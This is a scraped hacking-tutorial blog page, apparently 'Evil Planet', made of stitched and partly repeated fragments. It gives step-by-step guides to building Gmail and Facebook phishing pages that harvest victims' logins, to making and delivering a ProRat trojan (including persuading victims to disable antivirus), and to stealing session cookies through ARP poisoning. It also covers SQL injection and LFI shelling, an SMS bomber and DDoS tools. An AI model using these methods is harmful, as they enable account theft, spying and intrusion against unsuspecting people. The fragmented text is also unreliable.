Monday, February 3, 2014

MD5 Cracker - Download

MD5 Cracker is the tool used to crack MD5 Hash. Normally many sites and applications store sensitive informattion like passwords in the hexadecimal format i.e. MD5 hash...

Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Nmap is a perfect scanning tool for hackers out there and boy..they use it extensively.Many systems and network administrators NMAP running on Windows XP command prompt

NMAP running on Windows XP command prompt

also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime .I will be discussing about how to do simple scanning in Nmap.

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

As announced before we would be writing related to wifi attacks and security, This post is the second part of our series on wifi attacks and Security, In the first part we discussed about various terminologies related to wifi attacks and security and discussed couple of attacks. This post will also show you how one can easily crack WEP keys in no time.

Create A Gmail Phishing (Mobile)

See Demo- http://gemall.wapka.mobi

What is Phishing ?
Phishing is a way of deceiving your victim by making him login through one of your webpages which is a copy of the original one. By doing so the fake webpage will save his E-mail ID or username and password. This is used for criminal activities for stealing Credits Cards and So on.
Now we are going to make a fake login page of Gmail Mobile.
Lets start the tutorial...

Step 1:
Register a new Wapka Account First create a new wapka account from the link below.
Wapka.Mobi

Step 2: Go to Admin Mode.

Step 3: Edit Site >>mail form>>
**Remember: Enable CAPTCHA pictures: Must UnMark it ..**

Now press Submit & Remember Don't set it admin mode.
Step 4: Now Make a source of ur site. Don't no about source view?
Go to http://wap0fbd.tk/wapmaster/source_viewer & put your site link in the box and view the source.....
Now the main work of this tutorial is collecting like the value="117465354" code by source.
You have to search that value carefully....

Next step>> After collecting the
value="XXXXXXXX" code u Must hide the mailform in Admin Mode.
How to hide it on Admin Mode???
Ans: Go To Edit Site>user>Items visibility>Now click on X.

Now its Done.

Step 5:
Go Here http://pastebin.com/ckj1hh1L and copy the main Code Of Wapka Phishing Page..

Step 6:
At Last After Finishing All Work Now U Can Put This Code on your site at last.... For This Code Wapka Advertise will be remove from foot of your site......
Enjoy
Go EDIT SITE>WML/XHTML>PUT THIS

Remember: U have to keep this code below of all codes.

Remember to
replace value="XXXXXXX" to Yours.
**U have done it.**

Now the main Question that How can i get The Hacked User Name and Passaword?
Yes, U can get The hacked User name & Password at your Mail inbox which U have used in Wapka.mobi Registrating.
Thanks to all.
Note: This method only for Advanced WapMaster.

Courtesy: Hacker University

How To Hack A Website

Pop quiz: what does Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal all have in common?
They’ve all been recently hacked.
Yes, hacking is a growing threat for every business both large and small.
Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time.
Hackers can attack in so many ways, but here’s the ten most popular ways they can threaten the security of your site, and your business:

10. Injection Attacks

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.
In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

Technical Injection Attack Example:

An Injection Attack could have this command line:
String query = “SELECT * FROM accounts WHERE custID=’” + request.getParameter(“id”) +”‘”;
The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ’1′=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

LFI exploitation via php://input [Shelling Sites]

Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.

So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:

Code:

http://www.site.com/index.php?page=

You can have anything similar to that as long as you can be able to read files and obtain an "include" error.

First things first, give it a shot and see if you can read "/etc/passwd"

How to change your folders background?

Guys bored of having folders with white default backgrounds? Change your backgrounds with your favourite images...

Step 1: Have the Folder you want to put the background on open!

Step 2: Open up Notepad, then simply paste in this code:

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]

iconarea_image=***Picture Location Here!***\***Name of File!***

Step 3: Go to ur picture (the picture you want to use!) and right click and select properties and find the file location for example lets say my file is in "my hardrive" it would be located at "C:\\" understand? copy the location!

Mr.Lion SMS Bomber - Free Download

This one more free sms bomber to bomb your victims mobile with tons of sms...

DOWNLOAD

Complete list of Linux Commands

An A-Z Index of the Bash command line for Linux:

a

alias Create an alias •

apropos Search Help manual pages (man -k)

apt-get Search for and install software packages (Debian/Ubuntu)

aptitude Search for and install software packages (Debian/Ubuntu)

aspell Spell Checker

awk Find and Replace text, database sort/validate/index

How to Jailbreak Apple Devices

Hello everyone, this tutorial is about how to jailbreak any apple device. If you are not sure what this does for you, you might want to keep reading, due to the fact that this is a very useful technique to make the most out of your apple device. From now on, I am going to say iPod, because it is easier to mention one object that having to mention a lot. Jail breaking an iPod gives you a lot of features, like free apps, free music, a YouTube downloader, awesome themes for your iPod, and much more! Anyway, a lot of people say it is illegal. It isn’t, but if you do jailbreak, Apple will not help you if your iPod gets messed up. But a trick to this is to restore, and then get their help.

Starting:

IObit Malware Fighter v2 Full

IObit Malware Fighter is able to detect and remove malware of all kind, like spyware, adware, trojans, keyloggers, bots, worms, and hijackers, ensuring you a safer PC. With Real-time Protection and creative Cloud Technology, it keeps your computer secure all the time. IObit Malware Fighter is fully compatible with all antivirus products and can assist your antivirus products to ensure your PC at its top security.

DOWNLOAD

Hacking Websites with LOIC, A DDoS attack tool

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP udp or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

DDoS Attack - Learn how to hack a website(without Software)

Today I will discuss an Advanced Attack to Deface a site. This Attack is used to stop functioning of a site so that no one can access it.

NOTE: Remember friends this is purely for educational purposes, please please please don't use this for illegal activities... Don't use it to harm any Server or site.

DDoS Attack:

How to change MAC Address in Backtrack 5r3

Changing MAC Address is very simple in Backtrack. Process involves very few simple commands. Here are the steps...

1. First Check you mac address with the command ifconfig

Hack A Facebook Account With Man In The Middle Attack

Friends, now a days, Social networking is ruling the world and the queen of social networking is obviously Facebook. It has currently over 900 million users and day by day they are increasing. As the popularity increasing, do the frauds are also... Every day a lot of people are searching for the methods of Facebook hacking and "How to hack Facebook" is one of the trending search terms of Google these days. And so

Today, i am back to you again with a new kind of attack to hack Facebook passwords.

This attack is called as Man in the middle attack. And here it goes..

New Method & Design Of Facebook Phishing

DEMO: http://fb-secure.wapka.mobi

Step 1:

Step 2: Go to Admin Mode.

Step 3: Edit Site >>mail form>>

**Remember: Enable CAPTCHA pictures: Must UnMark it ..**

Basic SQL injection with Login Queries

Bypassing Login pages on websites using SQL injectable queries

Level: Beginners and Intermediate
Requirements: Patience and stradegy
Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.

What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.

Today you will learn in this post to make pro rat trojan. Using which you will be able to hack the whole victim computer including all the Facebook, twitter and other email id's saved passwords. Seems interesting so lets start!

What Is Pro Rat Trojan ?

In short,Pro rat trojan is the type of trojan which uses it's spying ability to spy in your victims computer and let you control it.

Making Of Pro Rat Trojan:

Generally there are lot of ways to make pro rat trojan but I shall teach you the easiest way to make it . Things you need for it are given:

ProRat

Log onto no-ip.com and get registration there with an account .(I leave this easy part on you, As you might have experience of signing up)

Hack Social & Email Accounts With Side-Jacking

Today in this article I am going to explain how to steal such cookies of different accounts using Cain – Abel and Wireshark software and how to use it to access our victim accounts.

First off I need to say that this will NOT steal anyones password unless they log in while you are monitoring them. This will however give you their cookies which you can use to steal there session and have full acess to their account. This will work for Facebook, a lot of emails (sorry no gmail), and just about any forum (except this one). If you are familiar with SSL strip you can use this method to hijack any session (paypal, bank websites, any email, etc.)

Facebook Cookie Stealing And Session Hijacking

Wireshark Software to capture cookies:

Wireshark is the best free packet sniffer software available today. Actually, it was developed for making a network secure. But, the same software is now used by hackers to test for vulnerability and security loopholes in the network and to attack the network accordingly. Cookie stealing being one of the types of hacks implemented using this Wireshark software.

Requirements:

Cain and Abel : http://www.oxid.it/cain.html
Wireshark : http://www.wireshark.org/
Firefox 3 (or one compatable with add n edit) : http://www.oldapps.com/firefox.php?old_firefox=59
Add n Edit (cookie editor for firefox) : https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies/
Acess to the network with user you want to hack
Network traffic

Prerequisites: Download and install all above programs. To add “Add n Edit” to your browser just open firefox, go to tools, then click add-ons. you can drag and drop the program from wherever you saved it into the little box that popped up and install it from there.

Below, I have listed steps on how to capture Facebook and other accounts cookies. This will help you to know how Wireshark and Cain-Abel can be used to sniff packets and capture cookies.

What Is Keyloggers?

Using key logger utility you will be able to establish full control over your computer. You will also find out, what was going on your computer in your absence: what was run and typed etc. which act as best children internet protection software. Using the keylogging program constantly, you can restore the previously typed text in case you have lost it. Keystroke logger software works in the hidden mode and invisible on Windows operating system including Windows 7/VISTA/XP/Server 2008/NT/98 etc. It can send U what ur Victim Typed via Emails, FTP, PHP site, etc.

Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend’s facebook password. Here i’m writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.

Please Note: Phishing is legally offensive. I am not responsible for any action done by you.

Block Porn Websites On Your Computer

Do You want to protect your children from watching porn movies online? You are not the only one. Almost all parents want to protect their children from watching porn online. But Internet has made it easy to get in touch with porn content. With the growth of Internet usage, average age of Internet exposure to pornography is going down. Now its only 11 years.

Save Your Facebook Fanpage From Getting Hacked

The inceasing rate of people complaining of Hackers hi-jacking their Fanpage these days is getting higher. Recently only
larger fan pages (those with one-
hundred thousand or more fans) have
been hacked, smaller sized fan pages are starting to be hacked along side
those larger pages too which makes people lost alots of Tracfics to their site/blogs.
SsquareTech have figured out as well as
educated a lot of Facebook fan page
owners about how they can get their
fan pages back once they have been
hacked, but the intent behind this
particular article is to show you the way to defend your Facebook fan page account
from hackers regardless of whether
you have a small or large page.
Although it does not
stop the page from being hacked. It will
allow you to reclaim your administrator
rights to the page back when the hackers have
deleted you. It is important to make sure your page is protected in this way
because it is extremely difficult to get
anyone at Facebook to return the page to
their rightful owners.

16 Steps To Protect Your Facebook Fanpage
From Hackers
Now follow this steps below

1. Setup a fake profile on Facebook and make friend with your orignal account(use
an email address or Phone number that is not already used
for Facebook)
2. Log out of the fake account and log in

Here I Am Discussing About The Top 10 Ways Of Hacking A Facebook Account

1. Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim login through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

Learn Hacking (Where To Start)

A lot of people ask “How do i learn hacking?”, “Where do i start?”, “How do i become a hacker”… and so on. I answered the question a million times. Now we all can just give them this link to my blog.This is my opinion about everything. Others might think about it in a different way. Eat it or just throw it away.
What is hacking?
Hacking is a hobby. There are many ways of hacking. Some break security systems, some reverse code and some write homebrew things. In my opinion everything has todo with hacking. If you want to become a “hacker”. You have to get some knowledge in computer science and love to play around with it. That’s basicly everything a hacker needs ;).

Hack A Website With Sql Injection(SUPER DETAILED)

Hacking_Peeps SQLi Tutorials
Difficulty: Basic Level 2 and Intermediate
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.

There are many types of SQL injection when it comes to web hacking
However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page

Spy Others Computers With Trojan Virus

What Is Pro Rat Trojan ?

In short,Pro rat trojan is the type of trojan which uses it's spying ability to spy in your victims computer and let you control it.

Making Of Pro Rat Trojan:

Generally there are lot of ways to make pro rat trojan but I shall teach you the easiest way to make it . Things you need for it are given:

ProRat

Log onto no-ip.com and get registration there with an account .(I leave this easy part on you, As you might have experience of signing up)

Now download their Dns update client . Run it and by the help of it update your hostname and save it

Now we will PING on our host to check whether our host ip has been associated with the chosen server or not.

WHAT IS PING ?

It is the good question . Ping is a program that sends a series of packets over a network or the Internet to a specific computer in order to generate a response from that computer. The other computer responds with an acknowledgment that it received the packets. Ping was created to verify whether a specific computer on a network or the Internet exists and is connected.

Back to the point.

Go to RUN and enter CMD in it . A window will pop out , it is the command prompt well you can guess it's work from it's name . Now enter in it PING *NAME OF YOUR HOSTNAME*

,press enter and it would reply with your ip .

After ensuring it that you have been connected to chosen server move to the folder where you have installed the pro rat and open pro rat.exe . A window will pop out , now refer to the photo given bellow .

Click on creat and then click on create pro rat server as given . Now for a window will open and will take necessary information refer to another photo given bellow .

After filling the options click on Create Server and your server would be ready to give out to your victim . Attach it to the file or directly give it to your victim . I left it on you.

Note: You can use many social engineering tricks to send the file to the victim. You may also ask the victim to turn of antivirus its a new game. Later I shall post about how to hide your server from antivirus.

When the victim will run the server , Open the pro rat again and goto pro connectivity and click on the button given bellow more refer to the photo:

Thus you can do lots of things using it. You can log all the keys pressed by victim, can take screen shots of his pc. And Much more.

Note: The Admin & Authors Of Evil Planet Will Not Be Responsible For Any Damages Caused By You.

Hack Social & Email Accounts With Side-Jacking

Today in this article I am going to explain how to steal such cookies of different accounts using Cain – Abel and Wireshark software and how to use it to access our victim accounts.

Facebook Cookie Stealing And Session Hijacking

Wireshark Software to capture cookies:

Requirements:

Below, I have listed steps on how to capture Facebook and other accounts cookies. This will help you to know how Wireshark and Cain-Abel can be used to sniff packets and capture cookies.

First: Gain acess to the Network. Open networks or your own network would be easy but if you have a specific slave you want you should be able to gain acess using Backtrack.

Tip: use reaver to exploit WPS for WPA/WPA2 encryptions, WEPs are easy to crack given time and OPN means there is no password.

Second: Right click Cain and choose ‘run as administrator.’ on the top bar go to ‘configure’ and be sure to select your wireless card/adapter. now click where it says ‘Sniffer’ then this litte button towards the top left:

Next click any empty white box then the blue “+” symbol near the button you pressed just before. choose okay

should look like this:

These are all the devices it was able to detect.

Now we go to APR on the bottom bar. Once again click any empty white box then the blue cross. It’s easiest to just go one by one and choose all possibilities.

Now we have to poison them so we choose the little yellow hazard symbol towards the top left. should now look like this:

we are done here, just minimize Cain for now.

Third: Run wireshark as administrator. On the top bar choose ‘Capture’ then ‘Interfaces.’ Here you will have to choose your interface that is connected to the Network we are sniffing from. if you wait a few seconds you might see some traffic being collected as seen in my photo, just choose that interface b/c thats most likely it.

Wireshark will list and color-code all the traffic it sees for you. To make this simpler we can use the filter to only see the traffic we want, Type “http.cookie” in the filter. (Something to consider is to just filter to “http” and scroll through the entries looking for ones that start with the word “POST” this means that information was submitted to the webpage noted such as a username and a password! so if you see this just look through the details and you should see the info you want, most passwords will be hashed but use this site to decript them:http://www.md5decrypter.co.uk/ )

Here is an image:

You can either look through this information manually or use the search function to find what you want. In my case i want to hijack the session of a user on the forum freerainbowtables.com so i will use the search function (press Ctrl+F, or go to edit -> search) and type in the information i know for sure will be in the entry. if your hijacking someones facebook put ‘facebook’ there. Most of the time to be safe i do not use the first entry i see b/c this will only work if the person is auto logged in, so just go down a few more until you see one you think will work (just use common sense).

What we need are the cookies. Here are what mine look like and how to get there. With practice you will be able to tell which cookies are used for logins and be able to limit failed attempts.

Copy the cookies as value and save them into a notepad (shown in pic above). I would suggest to seperate everywhere you see a “;” bc this suggests that is the begining of the next entry. The text to the left of the = is the name of the cookie and the text to the right is its value.

Final: Open up your firefox browser with Add n Edit enabled. You can get to your add ons by going to tools and they should all be listed in the drop down tab. First go to the website you are hijjacking the session from then open your cookie editor. Should look something like this:

The last thing to do is to change your cookies to match the ones you captured. If the cookies given to you by the site expire (like the ones in my picture do) you will have to delete them and add all the ones we captured earlier in. if they do not expire you can just edit them. Bottom line is all the cookies must match the cookies you captures in the earlier steps EXACTLY! Make sure you do not add any extras and that you did not miss anything. Also all fields must be filled in (Path and Domain as well as Name and Value). My path is “/” and my domain is “.freerainbowtables.com”
mine looks like this:

You are now done, Just close the cookie editor and reload the webpage. If done correctly with the correct cookies you should be logged in as the user you attacked!

Hope You Guys Like IT !!!!!!!!

Note: The Admin & Authors Of Evil Planet Will Not Be Responsible For Any Damages Caused By You.

Tutorial Categories

Monday, February 3, 2014

10. Injection Attacks

Technical Injection Attack Example:

Friday, January 31, 2014

Wednesday, January 29, 2014

Tuesday, January 28, 2014

Thursday, January 23, 2014

Facebook Cookie Stealing And Session Hijacking

What Is Keyloggers?

Here I Am Discussing About The Top 10 Ways Of Hacking A Facebook Account1. Phishing

Sunday, January 19, 2014

Saturday, January 18, 2014

Facebook Cookie Stealing And Session Hijacking

Here I Am Discussing About The Top 10 Ways Of Hacking A Facebook Account

1. Phishing